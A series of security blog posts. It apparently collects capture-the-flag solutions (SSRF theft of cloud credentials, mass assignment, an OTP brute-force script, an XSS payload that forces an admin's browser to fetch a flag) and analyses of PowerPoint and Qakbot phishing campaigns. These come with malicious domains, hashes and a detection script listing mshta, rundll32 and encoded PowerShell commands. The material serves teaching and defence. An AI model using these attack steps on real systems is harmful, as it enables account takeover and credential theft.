$unencryptedData = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)
# Write the plaintext to a new file with the 8-character ".HKADYYY" extension stripped,
# leaving the encrypted original in place
$outputPath = $fileToDecrypt.Substring(0, ($fileToDecrypt.Length - 8))
[System.IO.File]::WriteAllBytes($outputPath, $unencryptedData)
$decryptor.Dispose()
$aesManaged.Dispose()

Using the routine to decrypt the file:

Decryption routine will reveal the final flag


That’s it for this blog series. We hope you enjoyed reading, and we look forward to seeing you at Hackaday 2021!

Hackaday 2020 – Securing the basics [P-2]

Cloud Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year!

Make it Rain in the Bucket (50 pts, 14 solves)

Description: Unintended sensitive information disclosure comes in many shapes and forms. You would be surprised with the information you can find through detailed enumeration and a bit of online research. Can you unlock the secrets within to take you to the next part of the network? http://www.hackaday.info

P.S. AWS account is not required for this question

This first challenge is meant to emulate an unsecured AWS S3 bucket. The website hackaday.info is a static webpage hosted as an AWS S3 bucket. When hosting a website as an AWS S3 bucket, the bucket name (hackaday.info) must match the domain name (hackaday.info). By enumerating the site with a ping request, we get the following data:

The ping returns with the domain name s3-website.ap-east-1.amazon.com. If we access the domain, it will return the objects stored in the bucket.

An interesting file should catch your attention, admin_users_only/useraccess.txt, which contains the first flag.

Keys behind the wall (100 pts, 8 solves)

Description: There might be something insecure with this web application, if you could find the keys behind this application, you are one step closer to the image. The flag format is hackadayxxxxxxx

This challenge was meant to emulate an SSRF vulnerability in the application hosted on an AWS EC2 instance.

The SSRF attack allows an attacker to request the metadata of the EC2 instance. In AWS the metadata can be accessed by browsing to

As shown below, the AccessKeyId, SecretAccessKey and token are exposed, and an attacker could then impersonate the role attached on the machine using the temporary credentials and conduct additional discovery. The second flag is the role name.

Secret in the Image (200 pts, 1 solve)

Description: The secret lies in the image

This challenge was meant to emulate a misconfigured AMI-image which allows public access. With the credentials for programmatic access to AWS obtained from the second challenge, we can use our own AWS account to impersonate the role by changing the authentication file ~/.aws/credentials.

Once we assume the role, we can start enumerating the policies attached to the role to determine the level of privilege that the role has.

As shown above, the role has two policies attached. The hackadaypolicy is a custom policy created for this role. The next step would be to enumerate the hackadaypolicy to determine what permissions are assigned in the policy.

The screenshot above shows all the permissions that are assigned to the policy. If we enumerate all the permissions given, we stumble upon ec2:DescribeImage, which has the parameter set to public = true with the AMI-ID shown.

This shows that the AMI created by this role is public, which allows anyone with an AWS account to use it.

We can then find the image under Community AMIs and launch an instance from it.

Once the instance launched from the AMI is up, the third flag can be found in its /tmp folder.

That’s it for this challenge; stay tuned for the third and last post, which will walk through the Incident Response and Threat Intelligence challenges.

Hackaday 2020 – Securing the basics [P-1]

Web Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition for undergraduate students, aiming to raise the competency of future talent and better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Securing the Basics”, based on the experience and real-life challenges that organisations in Hong Kong faced in 2020, as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we provide solutions to the different challenges the students faced. We hope this will encourage even more students to get their hands on the keyboard next year!

Web Challenge – With great power comes great responsibility!

Hackaday Chat System 1 (100 pts, 4 solves)

This challenge is meant to exploit broken access controls on a website. After registering and logging in, you will notice several pre-existing accounts (i.e. operator_day1, admin_day1, admin_day2) in the “Select User” drop-down list. The account operator_day1 is our target for this challenge.

The key element is the user’s UUID in the user profile page. In this system the UUID is derived as the MD5 hash of the user’s email address, so it is predictable rather than random. Computing the hash of the operator’s email with an MD5 generator, we can open the profile page of operator_day1 directly at /profile.php?uuid=14a7a7da8dfcba61a4af2b695a553cf0, as the page never checks that the logged-in user is allowed to view that profile.

Inside operator_day1’s profile page we can retrieve the SHA-256 hash of the user’s password. Using an online hash-cracking (lookup) site, we recover the plaintext password of the operator account, which is only possible because the hash is an unsalted SHA-256 of a weak password.

After logging in with the operator account, the flag will be displayed at the chat box.

Hackaday Chat System 2 (150 pts, 1 solve)

This challenge extends Chat System 1. This time, the account admin_day1 is our target.

In operator_day1’s profile, a new endpoint, updateUser.php, is available to update the username or password. However, after clicking the button, an error message says that the renaming function is under maintenance.

Using a web proxy tool, we can edit the request’s form data to delete the name-changing parameter. As the endpoint is also vulnerable to parameter injection (mass assignment), adding a new field “role” lets us set the user’s role directly.

Here we craft a request to change the role of operator_day1 to administrator, the same role as admin_day1.

With administrator privileges, we can now change the password of admin_day1 to one of our choice. (Note that the UUID in the request is that of the admin_day1 account.)

After logging in to the system with admin_day1 account, we can retrieve the flag in the chat box.
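Added example in Python, not the challenge’s PHP: the two flaws exploited above, a user identifier derived from the email address (Chat System 1) and an update handler that copies every submitted field onto the record (Chat System 2), are modelled with a constructed in-memory user table, each beside its fix. The email addresses, field names and passwords are assumptions for the example.

```python
"""Predictable object IDs (Chat System 1) and mass assignment (Chat System 2),
vulnerable handlers beside the fix.

Added example, not the challenge's PHP. The user table, e-mail addresses and
field names are constructed for illustration.
"""
import hashlib
import uuid
from typing import Dict


def predictable_uuid(email: str) -> str:
    """The challenge's scheme: uuid = md5(email). Anyone who knows or can guess
    a user's address can build /profile.php?uuid=... for that user."""
    return hashlib.md5(email.encode("utf-8")).hexdigest()


def unguessable_uuid() -> str:
    """Fix for the identifier: a random v4 UUID carries no user-derived data.
    Authorisation must still be enforced server-side (see update_user_safe)."""
    return str(uuid.uuid4())


def make_users() -> Dict[str, Dict[str, str]]:
    """Constructed user table keyed by the predictable UUID. Passwords are stored
    as unsalted SHA-256 only to mirror the challenge; that is what let the
    operator's hash be recovered from a lookup site."""
    users = {}
    for name, role, pw in [("operator_day1", "operator", "operator-pass"),
                           ("admin_day1", "administrator", "admin-pass")]:
        users[predictable_uuid(f"{name}@hackaday.com")] = {
            "name": name, "role": role,
            "password_sha256": hashlib.sha256(pw.encode()).hexdigest()}
    return users


def update_user_vulnerable(users, session_uuid: str, form: Dict[str, str]):
    """updateUser.php as exploited: every submitted field is written to the
    record named by form['uuid'], so an injected role=administrator sticks, and
    nothing checks whether session_uuid may edit that record at all."""
    target = users[form["uuid"]]
    for key, value in form.items():
        if key != "uuid":
            target[key] = value
    return target


WRITABLE = {"name", "password_sha256"}   # role is never client-settable


def update_user_safe(users, session_uuid: str, form: Dict[str, str]):
    """Fix: allow-list the writable fields and decide authorisation from the
    *stored* role of the acting session, never from anything in the request."""
    actor = users[session_uuid]
    target_uuid = form["uuid"]
    if target_uuid != session_uuid and actor["role"] != "administrator":
        raise PermissionError("cannot edit another user's profile")
    target = users[target_uuid]
    for key in WRITABLE.intersection(form):
        target[key] = form[key]
    return target
```

The vulnerable handler reproduces both steps of the write-up: first the operator’s own record gets role=administrator, then the admin’s record gets a new password. The safe handler rejects the second step outright and silently drops the role field in the first.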

OTP Member Portal (150 pts, 0 solves)

Description: Multi-factor authentication (MFA) is an electronic authentication method in which a user is granted access to a website or application only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something only the user knows), possession (something only the user has), and inherence (something only the user is) – SUPER SAFE!

This challenge aims to bypass the password login step and brute force a weak MFA implementation.

Once you register an account in the system and complete a normal login, you will notice that:

  1. You need an account on the Hackaday Chat System in order to receive the OTP
  2. The OTP is a 3-digit code from 100 to 999, i.e. only 900 possible values
  3. The account is locked after 5 incorrect OTP attempts
  4. You can send a request to reset the failure counter and the OTP
  5. The target account of this challenge is admin_day2@hackaday.com
  6. Exploiting the target account in the Hackaday Chat System would not work, since admins do not receive OTPs from the chat system
  7. The normal login process is shown in the graph below

The point of exploitation is the password login step. Due to broken access control, after the “password incorrect” message is shown we can still open the OTP login page directly, with the target account information already embedded in the PHP session.

You could therefore write a script to brute force the OTP:

  1. Log in to the account admin_day2@hackaday.com with a random password
  2. After seeing the “password incorrect” message, access /OTPlogin.php directly
  3. Brute force the OTP with at most 4 attempts per code, staying below the lockout threshold
  4. Submit a request to resend the OTP if all attempts fail
  5. Repeat steps 3 and 4 until the OTP login succeeds
  6. Access member.php with the same PHP session

A sample program written in Go (otp-sample.go) is provided for reference.

After finishing the above steps, the flag is displayed at profile.php.
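The brute force loop above, as an added example in Python (the page’s own reference script is otp-sample.go, which is not reproduced here). The portal is simulated in-process with the numbers the write-up gives (OTP from 100 to 999, lockout after 5 failures, a resend endpoint that resets the counter); the endpoint names, the user table and the attacker’s guessing order are assumptions made for the example. The same simulation, with require_password_step=True, shows the fix: the OTP page refuses a session whose password step did not succeed.

```python
"""Simulation of the OTP Member Portal flaw and its fix.

Added example; the portal and attacker are modelled in-process and nothing here
talks to the real challenge. Numbers follow the write-up: 3-digit OTP in
100-999, lockout after 5 wrong guesses, a resend endpoint that resets the count.
"""
import random
from typing import Dict, Optional


class OtpPortal:
    """require_password_step=False reproduces the flaw: the OTP page trusts the
    e-mail that a *failed* password login left in the session."""
    MAX_FAILS = 5

    def __init__(self, users: Dict[str, str], seed: int, require_password_step: bool):
        self.users = users                              # email -> password (constructed)
        self.rng = random.Random(seed)                  # seeded so runs are repeatable
        self.require_password_step = require_password_step
        self.sessions: Dict[int, dict] = {}
        self.otps: Dict[str, int] = {}
        self.fails: Dict[str, int] = {}
        self.otps_issued = 0

    def login(self, email: str, password: str) -> int:
        """login.php: the target e-mail is written to the session before the
        password is checked; a wrong password only shows a message."""
        sid = len(self.sessions) + 1
        self.sessions[sid] = {"email": email,
                              "password_ok": self.users.get(email) == password}
        return sid

    def _issue_otp(self, email: str) -> None:
        self.otps[email] = self.rng.randint(100, 999)  # 900 possible codes
        self.fails[email] = 0
        self.otps_issued += 1

    def otp_page(self, sid: int) -> str:
        """OTPlogin.php: sends an OTP for the session's e-mail on first visit."""
        s = self.sessions[sid]
        if self.require_password_step and not s["password_ok"]:
            return "denied"
        if s["email"] not in self.otps:
            self._issue_otp(s["email"])
        return "otp sent"

    def resend_otp(self, sid: int) -> None:
        """Reset endpoint: a fresh OTP and a cleared failure counter."""
        self._issue_otp(self.sessions[sid]["email"])

    def otp_login(self, sid: int, guess: int) -> str:
        s = self.sessions[sid]
        if self.require_password_step and not s["password_ok"]:
            return "denied"
        email = s["email"]
        if self.fails[email] >= self.MAX_FAILS:
            return "locked"
        if guess == self.otps[email]:
            s["member"] = True
            return "ok"
        self.fails[email] += 1
        return "wrong"


def brute_force(portal: OtpPortal, target: str, max_rounds: int = 5000) -> Optional[int]:
    """Steps 1-6 of the write-up. Four guesses per code stays one short of the
    lockout; each resend draws a fresh OTP, so every round is an independent
    4-in-900 chance and about 225 rounds are needed on average."""
    sid = portal.login(target, "not-the-password")     # step 1: any wrong password
    if portal.otp_page(sid) == "denied":                # step 2: straight to OTPlogin.php
        return None
    for round_no in range(max_rounds):
        guesses = random.Random(round_no).sample(range(100, 1000), 4)
        for guess in guesses:                           # step 3: at most 4 guesses
            result = portal.otp_login(sid, guess)
            if result == "ok":
                return sid                              # step 6: same session is now a member
            if result != "wrong":
                return None
        portal.resend_otp(sid)                          # step 4: resend, counter cleared
    return None                                         # step 5: gave up
```

The resend endpoint is what makes the arithmetic work for the attacker: without it, five guesses would end the attempt, but with a fresh code each round the expected cost is roughly 900 guesses spread over about 225 resends. Binding the OTP step to a verified password is the essential fix; counting resends against the account and using a longer OTP are defence in depth.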

OTP Admin Portal (100 pts, 0 solves)

This challenge targets the file upload feature of the system. We can upload any file, the only limitation being on file size. Uploading a .htaccess file that enables directory listing (‘Options +Indexes’) makes Apache list the contents of the upload directory, and the flag can be found through the link provided. This works only because the upload directory is served by Apache with per-directory overrides allowed, so the uploaded .htaccess is honoured.

Simple Message Board (250 pts, 3 solves)

Description: I found a message board online and it seems there is a secret hidden in it which can only be accessed by the admin. Do you know how to get the secret?

This challenge is about exploiting the message board with cross-site scripting (XSS) and/or cross-site request forgery (CSRF).

In the message board system, we are given three functions: one for posting a message to the board, one for clearing the log, and one for getting the flag.

It is observed that:

  1. Someone (likely the admin) frequently visits the board and clears the logs
  2. Both the name and message fields are vulnerable to XSS
  3. There is a hidden field (csrf_token) in the “Get Flag” form
  4. The cookie contains a PHP session ID and a field named “Admin”; changing the value of the “Admin” field to “Admin” does not work either

The goal is therefore to make the admin trigger the “Get Flag” function somehow, or to steal the admin’s session cookies.

Solution 1

To solve the challenge, we can post a script to the board that makes the admin’s browser call the “Get Flag” function itself, so the request carries the admin’s session cookie and the csrf_token rendered into the admin’s copy of the page:

      <script>
      setTimeout(function () {
        // read the csrf_token the page rendered for the admin, then submit Get Flag with it
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "getflag.php");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send("csrf_token=" + encodeURIComponent(document.querySelector("input[name=csrf_token]").value));
      }, 1);
      </script>

The script performs the following steps:

  1. Query the value of csrf_token on the page
  2. Send a form request to getflag.php to trigger the function

As the script may run before the csrf_token input has loaded, a small delay (for example with setTimeout, or an onerror/onload handler) is required so that the script executes successfully on the admin’s side.

After posting the script to the board and waiting a moment, the flag will be shown on the board.

Solution 2

To tackle the challenge another way, we can set up a listener that records incoming HTTP requests (for example a RequestBin-style service) and post the following script to the message board:


With this script, when the admin opens the message board, an HTTP GET request is sent to our RequestBin listener with all of the admin’s cookies attached. This requires the session cookie to be readable by script, i.e. not flagged HttpOnly.

After a short wait, we receive the request above with the information we need.

With the admin account’s cookies in our browser, we can now get the flag by clicking the “Get Flag” button.

Stay tuned for the second part of this blog series: Cloud challenge.

Presentation is Key

Criminals exploit PowerPoint documents and blog infrastructure to deliver RAT and steal cryptocurrency

DarkLab has recently responded to cybercriminal phishing attempts in APAC using unusual tactics, techniques and procedures (TTPs). While most phishing we observe carries MS Word or Excel attachments, this campaign used malicious PowerPoint (.ppt) files to eventually deploy the AsyncRAT malware and a Bitcoin clipboard stealer.

Malicious PowerPoint attachments are not entirely new. However, they remain rare enough to be unfamiliar, which increases the chances that unaware users open them.

This phishing campaign, likely still active, appears to focus on Asia, particularly China, although we also found samples uploaded to a popular multi-vendor AV scanner from countries in Europe. Most of the malicious documents have generic titles. However, the use of titles such as “Hotel Doc” for some lures suggests that the hospitality industry is one of the sectors targeted.

Phishing lure analysis

The first phishing email we picked up caught our attention for its use of Traditional Chinese characters, used in Hong Kong and Taiwan, as opposed to the Simplified Chinese used in Mainland China. The email included a malicious PowerPoint attachment named 付款詳情.ppt [MD5: 8311c59ef727826c4b54e182a956e312], which contains obfuscated malicious macros. The macro executes only when the user closes the file, likely to avoid raising the victim’s suspicion.

Fig 1 – Deobfuscated payload [MD5: 127538a7d8703ec96a5e39e9fd235c06]

After deobfuscation it is clear that the VBA macro uses the legitimate binary mshta.exe to fetch a hardcoded URL hidden behind the j.mp URL shortening service. The shortened URL eventually redirects to tumharimaakachodamarunmaine[.]blogspot[.]com/p/3-sunda-10-origin[.]html

Attack infrastructure and timeline

j.mp is an alternative domain of the better-known bit.ly shortening service. According to Bitly’s statistics, the malicious URL was created at the end of February.

Fig 2 – bitly creation data for the malicious URL

The URL points to a page the threat actor uses to stage a range of malicious payloads, from cryptocurrency stealers to an open source remote access trojan (RAT). We will get to those in a moment.

Pivoting on the identified staging page revealed a significant amount of additional attack infrastructure, with a new URL for each phishing document. These were all hidden behind the same j.mp shortener and hosted on Blogspot.

By checking the URLs’ creation dates on Bitly we built a timeline of the campaign, which shows that the threat actor has been active since the beginning of the year and has recently increased their activity.

Fig 3 – timeline of attack infrastructure set up


In terms of payloads, we could only examine one malicious URL [tumharimaakachodamarunmain[.]blogspot[.]com/p/42[.]html], where we found a number of scripts. We suspect that other URLs may host different payloads.

Fig 3 – Screenshot of the malicious webpage

The webpage looks benign at first glance. However, opening it with mshta.exe executes a number of JavaScript payloads embedded in the page on the victim’s endpoint.

The first script runs a set of VBScripts that fetch the content of the following link:


The file is deobfuscated and dropped to %Public%\bin.vbs before execution; it aims to disable security controls ahead of the subsequent malware stages.

Fig 4 – First script disables system’s security settings

The second script reaches out, again with mshta.exe, to the following URL: mylundisfarbigthenyouthink[.]blogspot[.]com/p/42[.]html

It contains three additional payloads that disable security defences and hide the attacker’s windows to conceal the malicious activity.

Then an additional PowerShell script is executed, loaded from one of two further sites depending on the system architecture.



The payload reflectively loads two further samples: a heavily obfuscated DLL with anti-analysis mechanisms [MD5: d1a426b9afe2ca1e56cdf48523c684e3], and the open source RAT AsyncRAT [MD5: 47c012de1faac9be5a860b600a06c5ee].

AsyncRAT can send and receive commands, record keystrokes and screenshots, and upload and download files via SFTP, among other functions.

The threat actors also try to steal victims’ cryptocurrency by replacing a legitimate wallet address with one they control. This is done by the PowerShell script shown below, which watches the clipboard for BTC wallet addresses and replaces them with the attacker’s address, so that a victim pasting a payment destination unknowingly pays the attacker. Our research into the attacker’s BTC address shows it had received only two small transactions, suggesting limited success so far.

Fig 4 – PowerShell script for cryptocurrency theft

Finally, the last script downloaded from the staging domain attempts to terminate excel.exe and winword.exe, in an attempt to hide the attacker’s tracks.


The attacker’s use of open source malware and abuse of freely available Blogspot pages as malicious infrastructure highlights the ever lower barrier to entry for cybercriminal operations in Asia. Despite the relatively low technical sophistication of this threat, the use of malicious PowerPoint attachments shows some innovation in social engineering. Overall, this campaign shows how even low-cost but multi-stage cybercriminal campaigns can pose a threat to organisations by combining unusual social engineering techniques with open source tools.

Indicators of Compromise

  • tumharimaakachodamarunmaine.blogspot.com
  • tumharimaakachodamarunmain.blogspot.com
  • ifyouarebadtheniamyourdadhehe.blogspot.com
  • myralundpakarloab.blogspot.com
  • mylunissharp.blogspot.com
  • mylundisfarbigthenyouthink.blogspot.com
  • 8311c59ef727826c4b54e182a956e312
  • d1a426b9afe2ca1e56cdf48523c684e3
  • 47c012de1faac9be5a860b600a06c5ee
  • f7fd745b52fb8e791254492eca2c41df9281430dcbc5b56baa715b32eeb417ed
  • ae133004d194c3701d0b2051904d07ad69c901830a710cc2de6cb465c67bdc9d
  • 015224452b3232f76924d4020b45cfc954b80a4f14563d9fe7dadffb1699f090
  • 4be0a1ade0230dc10ef523d30d3f28ab1e70a4b5587086edfcdbfa9b30fb9c9a
  • a07e7d0a6699cbcb960bbe8c3a34b85a878abda0d19cd98d2e0ce170369c7ccf
  • d925e0405f8b9a4c0c06751a36318bcccd54721c107c08dc851fec12b58ec9ab
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a
  • 4199e3e42abb7d71ca8183609e80225014ce4b232990d526ec0655b889aac5fd
  • 46730c85c3da44a3bfc2d4786db1bf1b0f13a0c523c3b7ae88749b3538d1b8c1
  • 4f0d613797aa59fbcb957162c37d586e020cfb65a886972b404bbda4473d0b5e
  • 65bbecd4400d257e8eb367b56ec846de4e4efaf3274622fd01c8751adde5d30b
  • 266ffecbcb98bd2401298ca8fbe8bdc9df9fd8ebdfee8acf267a43cedd870050
  • f9498a2b0d6c38da6ad465a0135c5d20817bffeaf5ed09b9de8a7a22ec1ada58
  • 4a90be311633d5052b7ef4c6edd0ccddd472daab1ce183af0763b69d47ce4406
  • dc36dea840aec26090afba82b6a93f706b73c850286e6d80d95bf0604cc72d43
  • 9da6a119d0986bb18a84cef88915c5934074d189b57c0ee62103b24549f1fd51

Robber Duck

Qakbot goes phishing in Hong Kong

Since the beginning of 2021, DarkLab analysts have observed multiple clients and third-party organisations in Hong Kong being targeted with phishing emails delivering the Qakbot malware, also referred to as Quakbot or QBot. While the Qakbot payload itself is well documented in open sources, we want to shed light on the observed attack chain to raise awareness of this threat and help mitigate future phishing attempts against organisations in Hong Kong and APAC.

Since the takedown of Emotet, one of the largest spam botnets and initial access brokers, the cybercriminals behind Qakbot have increased their operational tempo and are actively targeting Hong Kong. We therefore expect Qakbot to remain a threat for the region in the coming months, particularly given Qakbot’s links to known ransomware families.

Infection chain

Qakbot started as a banking trojan in 2009 but since 2019 has been seen exfiltrating sensitive financial data and email threads from victims, as well as delivering the ProLock ransomware.

The phishing emails we observed were sent from the likely compromised mailboxes of third-party companies. These earlier victims were based around the globe, from South America to Asia, highlighting the global scope of Qakbot’s operations.

The emails’ subjects and text suggest the threat actors hijacked existing email threads to add credibility to their lures. In one case, a phishing email to a large company in the real estate sector referred to a real high-profile event that the target organises each year, suggesting the phishing attempt was somewhat targeted rather than completely opportunistic.

Fig 1 – phishing email to a property developer delivering QakBot malware

In other phishing emails, like one sent to a retail organisation (see below), the threat actors attempted to spoof the sender so the message appeared to come from an organisation based in Hong Kong.

Fig 2 – phishing email to a retailer delivering QakBot malware

The emails have a compressed archive attached, containing a macro-enabled Excel document.

Fig 3 – overview of Qakbot infection chain

The latter displays a generic DocuSign-themed template and requires user interaction (enabling content) to activate the malicious macros hidden in the workbook.

Fig 3 – phishing lure used to deliver QakBot malware

We analysed one such lure document [filename: Document_1204144908-12232020-Copy.xlsm; MD5: 77a6bf34403b2a4e6e2eaa4435d22b50], whose macros serve as a dropper. The dropper contacts one of five hardcoded download URLs in an attempt to retrieve the same file, in this case named 55555555555.jpg, which is actually a DLL containing the second stage of the malware. Other droppers analysed showed similar behaviour despite different stager servers and DLL names.

We also found numerous documents similar to the one we analysed, reinforcing that this was indeed part of a larger phishing campaign.

Fig 4 – Example of similar phishing documents on Virus Total

The macro then executes the malicious DLL [MD5: 66adf2e8e5561bf7cf3f3cb50d9256bf] via rundll32.exe, a living-off-the-land technique threat actors use to proxy execution of malicious code through a signed Windows binary and avoid detection by security systems.

Fig 5 – Qakbot execution of malicious DLL via legitimate process

This specific campaign is linked to one of Qakbot’s botnets, abc117, while security researchers have linked other botnets, like abc123, to spam campaigns in other parts of the world. Malware operators often run several botnets to ensure resilience against law enforcement action and to deliver malware to a wider range of targets.
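Both Office-lure chains on this page, an Office application spawning mshta.exe with a shortened URL (the PowerPoint campaign in “Presentation is Key”) and Excel spawning rundll32.exe on a DLL disguised with a .jpg extension (the Qakbot chain above), are caught by the same parent/child process checks. The following Python is an added example of that detection logic, not tooling from either investigation: the log lines are constructed in the shape of Sysmon event ID 1 fields (UtcTime, ParentImage, Image, CommandLine), and the paths, timestamps and the encoded PowerShell fragment in them are made up.

```python
"""Parent/child process detections for the two Office-lure chains on this page.

Added example, not tooling from either investigation. SAMPLE_LOG is constructed
in the shape of Sysmon event ID 1 fields; its paths, timestamps and the encoded
PowerShell fragment are made up.
"""
import re
from typing import Dict, List, Tuple

OFFICE = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "rundll32.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
SHORTENERS = ("j.mp/", "bit.ly/")
URL_RE = re.compile(r"https?://\S+", re.I)
RUNDLL_MODULE_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^\s",]+)', re.I)
PS_ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s", re.I)


def parse_line(line: str) -> Dict[str, str]:
    """'Key: value | Key: value' -> dict with lower-cased keys."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip().lower()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Names of the detections that fire for one process-creation event."""
    parent = basename(event.get("parentimage", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("commandline", "")
    hits = []
    if parent in OFFICE and image in LOLBINS:
        hits.append("office_spawns_lolbin")          # both the .ppt and the .xlsm chains
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")              # mshta fetching a remote page
        if any(s in cmd.lower() for s in SHORTENERS):
            hits.append("mshta_url_shortener")       # j.mp / bit.ly in front of Blogspot
    if image == "rundll32.exe":
        m = RUNDLL_MODULE_RE.search(cmd)
        if m and not m.group(1).lower().endswith(".dll"):
            hits.append("rundll32_non_dll_module")   # e.g. 55555555555.jpg,DllRegisterServer
    if image == "powershell.exe" and PS_ENCODED_RE.search(cmd):
        hits.append("powershell_encoded")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(UtcTime, detections) for every line that fired at least one rule."""
    results = []
    for event in map(parse_line, lines):
        hits = classify(event)
        if hits:
            results.append((event.get("utctime", "?"), hits))
    return results


# Constructed sample telemetry (not real events from either incident).
SAMPLE_LOG = [
    "UtcTime: 2021-03-01 08:00:01 | ParentImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
    " | Image: C:\\Windows\\System32\\mshta.exe | CommandLine: mshta https://j.mp/3sunda10origin",
    "UtcTime: 2021-02-10 09:12:44 | ParentImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    " | Image: C:\\Windows\\System32\\rundll32.exe"
    " | CommandLine: rundll32 C:\\Users\\Public\\55555555555.jpg,DllRegisterServer",
    "UtcTime: 2021-02-10 09:12:46 | ParentImage: C:\\Windows\\System32\\mshta.exe"
    " | Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " | CommandLine: powershell -w hidden -enc SQBFAFgA",
    "UtcTime: 2021-02-10 09:13:00 | ParentImage: C:\\Windows\\explorer.exe"
    " | Image: C:\\Windows\\System32\\rundll32.exe | CommandLine: rundll32 shell32.dll,Control_RunDLL",
]

if __name__ == "__main__":
    for when, hits in scan(SAMPLE_LOG):
        print(when, ", ".join(hits))
```

The fourth sample line is the benign control: rundll32.exe launched by Explorer on a real .dll fires nothing, which is the point of keying the rule on the parent process and on the module extension rather than on rundll32.exe alone.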


Despite the successful law enforcement action in January against Emotet, one of the largest spam botnets, our findings suggest that other botnets are ready to step into the gap it left.

Operations like Qakbot show that phishing will remain a significant threat for companies in Hong Kong, as threat actors use such malware to obtain an initial foothold in corporate networks and to deploy further malware, including human-operated ransomware.

Strong email security processes and user awareness remain paramount to avoid the initial infection from similar phishing campaigns, which can lead to very impactful ransomware incidents. Threat feeds can also help detect the frequently changing attack infrastructure of botnets like Qakbot by providing up-to-date indicators of compromise for ingestion by detection systems. In particular, we found URLhaus’ database to be a useful source of Qakbot malware URLs that can aid network defenders.

C2 servers hardcoded in Qakbot DLL analysed

Note that not all of the IPs below are necessarily still in active malicious use; apply caution when using them for blocking.

Criminal Shopping Habits

Cyber threats to the retail sector

The retail industry is increasingly gearing towards e-commerce platforms and cashless, even contactless, payments – a trend accelerated by the Covid-19 pandemic.

Even before that, in 2020, 41% of shoppers said they would purchase online items they would normally go to a store for. In 2019, 53% of Hong Kong residents tried to be completely cashless, according to Visa. The retail and consumer landscape is clearly changing rapidly, and the cyber threats facing the industry are following suit.

As payments increasingly move online, so do cybercriminals’ attempts to steal payment card data. Traditional point of sale (POS) malware steals customer data by infecting retailers’ POS devices. While still present, POS malware is losing effectiveness due to increasingly secure card standards like EMV and the growing use of contactless payments, including mobile payment systems like Apple Pay and Google Pay.

Consumers’ growing appetite for e-commerce has therefore led criminals to adopt new tactics. One of the most widespread is stealing payment data on e-commerce websites by injecting malicious JavaScript skimmers into checkout pages, a technique known as Magecart.

The growing threat of web skimmers

Magecart is a common and hard-to-detect threat for online retailers. Researchers estimate that an e-commerce website is infected with Magecart code every 15 seconds. Some large-scale Magecart operations have compromised thousands of websites at a time, including about 2,000 e-commerce sites in just three days in September. In that case criminals likely injected the malicious JavaScript via outdated Magento 1 and Magento 2 installations.

Compromising popular third-party e-commerce platforms like Magento allows criminals to deploy JavaScript skimmers automatically on hundreds of vulnerable sites at once. Indeed, the name Magecart itself refers to this common intrusion vector (Magecart = Magento + shopping cart).

Magecart supply chain compromises are widespread. However, websites can also be targeted directly by exploiting vulnerabilities in the site itself. Malicious changes to checkout pages are often minimal and hard to detect: criminals can append just a few lines of code to a legitimate JavaScript library. A US precious metals retailer discovered this year that Magecart card-stealing code had been present on its website for some five months, likely affecting tens of thousands of customers. The incident highlights the stealth and long-term impact that a Magecart compromise can have on retailers.

Example of Magecart compromise

Human-operated Ransomware

Although customer data is a precious criminal commodity, cybercriminals also target retailers’ networks for extortion. Human-operated ransomware in particular is among the most impactful and widespread threats that DarkLab analysts have observed targeting Hong Kong organisations in 2020.

This year we helped two prominent Hong Kong retailers respond to network compromises by the Maze and NetWalker ransomware families. As is increasingly common among ransomware operators, the retailers were threatened with data leaks on top of data encryption. For retailers that process significant amounts of customer data, a leak presents serious reputational and regulatory concerns, not to mention the operational impact that widespread encryption of systems can cause.

As we previously reported, ransomware operators often exploit known vulnerabilities in victims’ external IT estate (including SSLVPN appliances) and exposed remote access services like RDP. However, large-scale phishing campaigns like Emotet’s can also result in ransomware deployment. A specialist news outlet recently highlighted that most malware infections, even from unknown or low-level variants, should be treated as potential ransomware incidents, given the growing popularity of initial access broker services.

Business email compromise remains a concern

DarkLab also observed companies in the retail sector falling victim to another widespread threat, business email compromise (BEC). The international supply chains that Hong Kong retailers rely on make them a target for fraudsters impersonating distant third parties to misappropriate funds. As working-from-home arrangements become more prevalent, fraudsters are also hijacking communications between two employees in the same territory; the lack of physical interaction between employees makes email fraud easier.

To do that, fraudsters adopt ingenious social engineering techniques. These include passively monitoring email exchanges from a compromised mailbox and modifying only a few selected details, like bank account numbers, so that employees do not realise their communications have been compromised until it is too late.

Strict rules for unusual bank transfers, as well as good email security hygiene can help prevent, or at least detect, these kinds of incidents.

